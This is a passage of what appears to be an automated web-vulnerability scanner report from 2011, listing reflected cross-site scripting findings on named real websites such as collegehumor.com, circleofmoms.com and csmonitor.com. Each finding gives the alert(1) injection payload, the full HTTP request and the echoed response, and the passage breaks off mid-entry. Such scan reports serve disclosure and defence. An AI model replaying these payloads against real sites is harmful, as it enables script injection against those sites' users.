The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 30336</title><script>alert(1)</script>4c31be8f536 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status30336</title><script>alert(1)</script>4c31be8f536 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bomb-mp3.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 21:23:24 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.12
X-Powered-By: PHP/5.2.12
Vary: Accept-Encoding
Content-Length: 742
Content-Type: text/html

<html>
   <head>
       <title>/server-status30336</title><script>alert(1)</script>4c31be8f536 not found on www.bomb-mp3.com</title>
       <meta name="robots" content="noindex">
   </head>
   <body style="font-famil
...[SNIP]...

3.14. http://www.bomb-mp3.com/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bomb-mp3.com
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 908b8<script>alert(1)</script>bc22bb557de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?908b8<script>alert(1)</script>bc22bb557de=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bomb-mp3.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 21:23:19 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.12
X-Powered-By: PHP/5.2.12
Vary: Accept-Encoding
Content-Length: 732
Content-Type: text/html

<html>
   <head>
       <title>/server-status?908b8<script>alert(1)</script>bc22bb557de=1 not found on www.bomb-mp3.com</title>
       <meta name="robots" content="noindex">
   </head>
   <body style="font-family:Luc
...[SNIP]...
<h1>/server-status?908b8<script>alert(1)</script>bc22bb557de=1 not found on bomb-mp3.com</h1>
...[SNIP]...

3.15. http://www.bomb-mp3.com/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bomb-mp3.com
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload fb923</title><script>alert(1)</script>d5aad96fbcc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?fb923</title><script>alert(1)</script>d5aad96fbcc=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bomb-mp3.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 21:23:19 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.12
X-Powered-By: PHP/5.2.12
Vary: Accept-Encoding
Content-Length: 748
Content-Type: text/html

<html>
   <head>
       <title>/server-status?fb923</title><script>alert(1)</script>d5aad96fbcc=1 not found on www.bomb-mp3.com</title>
       <meta name="robots" content="noindex">
   </head>
   <body style="font-fa
...[SNIP]...

3.16. http://www.bordersrewardsperks.com/server-info [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bordersrewardsperks.com
Path:	/server-info

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload c7fdd--><a>e930c88041c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-infoc7fdd--><a>e930c88041c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bordersrewardsperks.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Nxj-Sa: 2.114
X-Nxj-Release: empire_11.13.49147
X-Xrds-Location: http://www.bordersrewardsperks.com/nxj.xrds
X-Nxj-Auth: Security_AnonymousUser
Content-Type: text/html; charset=ISO-8859-1
Date: Sat, 02 Apr 2011 01:57:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=4sbtsp8jgm1lk0g4ipsd0ef3k5; path=/
Set-Cookie: nxjsess-aid-borders=5138794564d968276af4a82.14699254; expires=Tue, 01-Apr-2031 22:12:29 GMT; path=/; domain=www.bordersrewardsperks.com
Content-Length: 90733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404 Error</title
...[SNIP]...
<a>e930c88041cindex)-->
...[SNIP]...

3.17. http://www.bordersrewardsperks.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bordersrewardsperks.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 3524f--><a>ce78954ff49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status3524f--><a>ce78954ff49 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bordersrewardsperks.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Nxj-Sa: 2.109
X-Nxj-Release: empire_11.13.49147
X-Xrds-Location: http://www.bordersrewardsperks.com/nxj.xrds
X-Nxj-Auth: Security_AnonymousUser
Content-Type: text/html; charset=ISO-8859-1
Date: Sat, 02 Apr 2011 02:32:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=fmgdk6hvdm8ml0mhp2f6cl7im6; path=/
Set-Cookie: nxjsess-aid-borders=15506284614d968ac301c1e3.64236962; expires=Tue, 01-Apr-2031 22:47:54 GMT; path=/; domain=www.bordersrewardsperks.com
Content-Length: 90739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404 Error</title
...[SNIP]...
<a>ce78954ff49index)-->
...[SNIP]...

3.18. http://www.businessworkforce.com/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.businessworkforce.com
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 1150b><a>8cc0e9a51c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status?1150b><a>8cc0e9a51c9=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.businessworkforce.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404
Cache-Control: private
Content-Length: 20187
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: PORTAL=PARTNER=BUSINESSWORKFORCE%2ECOM&CookieVersion=2%2E0&USERCOUNTRY=US&USERGID=434780717746428821&HTTPREFERRER=&USERSTATE=TEXAS&NEWUSERSITE=&DIDIPLKUP=Y; expires=Sat, 31-Mar-2012 04:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 02:05:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/cs
...[SNIP]...
orce.com&t_pgid=638824041076414312&t_sn=/common/error/checkurl.asp&t_httph=www.businessworkforce.com&t_httpurl=/common/error/checkurl.asp&t_httpqs=404;http://www.businessworkforce.com:80/server-status?1150b><a>8cc0e9a51c9=1&t_sgid=526128553523471524&t_ws=COLO-WEB06&t_ugid=434780717746428821&f_ip=173.193.214.243&ud=>
...[SNIP]...

3.19. http://www.calorie-count.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.calorie-count.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4c17f<script>alert(1)</script>4194e5c342e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status4c17f<script>alert(1)</script>4194e5c342e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.calorie-count.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:26:57 GMT
Server: Apache
Content-Length: 2488
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 - Page Not Found</title>
<style type="text/css">
body {
background-color: #F2EFE8;
font-family: verdana, sans-serif
...[SNIP]...
<strong>http://www.calorie-count.com/server-status4c17f<script>alert(1)</script>4194e5c342e</strong>
...[SNIP]...

3.20. http://www.calorie-count.com/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.calorie-count.com
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dcfc1<script>alert(1)</script>f731867d4e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?dcfc1<script>alert(1)</script>f731867d4e2=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.calorie-count.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:26:56 GMT
Server: Apache
Content-Length: 2491
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 - Page Not Found</title>
<style type="text/css">
body {
background-color: #F2EFE8;
font-family: verdana, sans-serif
...[SNIP]...
<strong>http://www.calorie-count.com/server-status?dcfc1<script>alert(1)</script>f731867d4e2=1</strong>
...[SNIP]...

3.21. http://www.circleofmoms.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.circleofmoms.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4f323'><script>alert(1)</script>eae7495b66b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4f323'><script>alert(1)</script>eae7495b66b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.circleofmoms.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:19:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: vis=%22vid%3D25838395085%26sig%3Daa62b5cc72636bcd8f6c666af3d43a17%22; expires=Thu, 31-Mar-2016 02:19:34 GMT; path=/
Cache-Control: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<fb:login-button onlogin='window.location="http://www.circleofmoms.com/4f323'><script>alert(1)</script>eae7495b66b?fb_connect_ver=1";' style='float:right;'>
...[SNIP]...

3.22. http://www.circleofmoms.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.circleofmoms.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19560"><script>alert(1)</script>687e637b7eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /19560"><script>alert(1)</script>687e637b7eb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.circleofmoms.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:19:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: vis=%22vid%3D25838395082%26sig%3D83aa13ea407a54cb089874e4d6a1b187%22; expires=Thu, 31-Mar-2016 02:19:33 GMT; path=/
Cache-Control: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.circleofmoms.com/19560"><script>alert(1)</script>687e637b7eb" />
...[SNIP]...

3.23. http://www.circleofmoms.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.circleofmoms.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f457'-alert(1)-'8c110367aad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /7f457'-alert(1)-'8c110367aad HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.circleofmoms.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:19:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: vis=%22vid%3D25838395092%26sig%3Db0926a603015e349aeefe30d8d964d41%22; expires=Thu, 31-Mar-2016 02:19:34 GMT; path=/
Cache-Control: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
ntr_uid":0,"timestamp":1301710774,"buh":"3497390094b0f9d45ce0c2f958a02bae","url_ver":"1"},'5','5','1','http://www.circleofmoms.com/','http://www.circleofmoms.com/','25a1e39226da30cbcebb9d6dc591d1e1', '7f457'-alert(1)-'8c110367aad');</script>
...[SNIP]...

3.24. http://www.cj.com/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cj.com
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c85b4"><script>alert(1)</script>23c8d7fd070 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?c85b4"><script>alert(1)</script>23c8d7fd070=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cj.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Server: Apache
Vary: Accept-Encoding
Content-Length: 20816
Content-Type: text/html
Date: Sat, 02 Apr 2011 02:25:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="https://members.cj.com/member/login?nextpage=http://www.cj.com/server-status?c85b4"><script>alert(1)</script>23c8d7fd070=1">
...[SNIP]...

3.25. http://www.classesandcareers.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.classesandcareers.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd66b"-alert(1)-"7988eaf8949 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusdd66b"-alert(1)-"7988eaf8949 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.classesandcareers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:27:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.2
X-Runtime: 4923
Cache-Control: no-cache
Set-Cookie: message=The+page+you+requested+was+not+found.; path=/
Content-Length: 32842
Status: 404
Cache-Control: max-age=1800
Expires: Sat, 02 Apr 2011 02:57:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<script language="JavaScript">

   /* You may give each page an identifying name, server, and channel on
    the next lines. */
   s.pageName = "/server-statusdd66b"-alert(1)-"7988eaf8949";
   s.server = ""
   s.channel = ""
   s.pageType = ""
   s.prop1 = ""
   s.prop2 = ""
   s.prop3 = ""
   s.prop4 = ""
   s.prop5 = ""
   s.prop6 = ""
   s.eVar5 = ""
   s.events = ""
   if (typeof(searchSource) != 'undefin
...[SNIP]...

3.26. http://www.collegehumor.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.collegehumor.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfe4c"-alert(1)-"9357ab539ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusdfe4c"-alert(1)-"9357ab539ea HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 02:59:58 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 02:59:57 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 02:59:58 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 02:59:57 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=b1ecb62876e36a510d8955dde60890013adccb7b; expires=Fri, 01-Apr-2016 08:03:48 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=b1ecb62876e36a510d8955dde60890013adccb7b; expires=Fri, 01-Apr-2016 08:03:48 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
5480.iac.collegehumor";
jument.cookie.domain = ".collegehumor.com";
jument.home_url = "http://www.collegehumor.com";
jument.this_url = "http://www.collegehumor.com/server-statusdfe4c"-alert(1)-"9357ab539ea";
jument.user_id = 0;

// CH8 STUFF
var ch = window.ch || {};
ch.logged_in = false;
ch.this_url = 'http://www.collegehumor.com/server-statusdfe4c"-alert
...[SNIP]...

3.27. http://www.collegehumor.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.collegehumor.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab865'-alert(1)-'8f8e3c9d2a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusab865'-alert(1)-'8f8e3c9d2a5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 03:00:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 02:59:59 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 03:00:00 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 02:59:59 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=2c82681723835db50248706662f117d04be4f16b; expires=Fri, 01-Apr-2016 08:03:50 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=2c82681723835db50248706662f117d04be4f16b; expires=Fri, 01-Apr-2016 08:03:50 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
'8f8e3c9d2a5";
jument.user_id = 0;

// CH8 STUFF
var ch = window.ch || {};
ch.logged_in = false;
ch.this_url = 'http://www.collegehumor.com/server-statusab865'-alert(1)-'8f8e3c9d2a5';
ch.this_url_64 = 'aHR0cDovL3d3dy5jb2xsZWdlaHVtb3IuY29tL3NlcnZlci1zdGF0dXNhYjg2NSctYWxlcnQoMSktJzhmOGUzYzlkMmE1';
ch.home_url = 'http://www.collegehumor.com';
ch.user_id = 0;

...[SNIP]...

3.28. http://www.computerhope.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.computerhope.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76cf5"><a>a925de045d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status76cf5"><a>a925de045d5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.computerhope.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:27:41 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Length: 7664

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<title>404 error</title>
<meta name="robots" content="noindex, nofollow"
...[SNIP]...
<input type="text" name="q" size="15" value="server-status76cf5"><a>a925de045d5" class="bsbar">
...[SNIP]...

3.29. http://www.computerhope.com/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.computerhope.com
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52933"><a>cbbebfb569b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status?52933"><a>cbbebfb569b=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.computerhope.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:27:38 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Length: 7667

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<title>404 error</title>
<meta name="robots" content="noindex, nofollow"
...[SNIP]...
<input type="text" name="q" size="15" value="server-status?52933"><a>cbbebfb569b=1" class="bsbar">
...[SNIP]...

3.30. http://www.csmonitor.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csmonitor.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c614"-alert(1)-"ec3729c8b60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status7c614"-alert(1)-"ec3729c8b60 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.csmonitor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Sat, 02 Apr 2011 02:47:36 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86374
Expires: Sun, 03 Apr 2011 02:47:10 GMT
Date: Sat, 02 Apr 2011 02:47:36 GMT
Content-Length: 21621
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>



<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/server-status7c614"-alert(1)-"ec3729c8b60";

           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.31. http://www.csmonitor.com/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csmonitor.com
Path:	/server-status

Issue detail

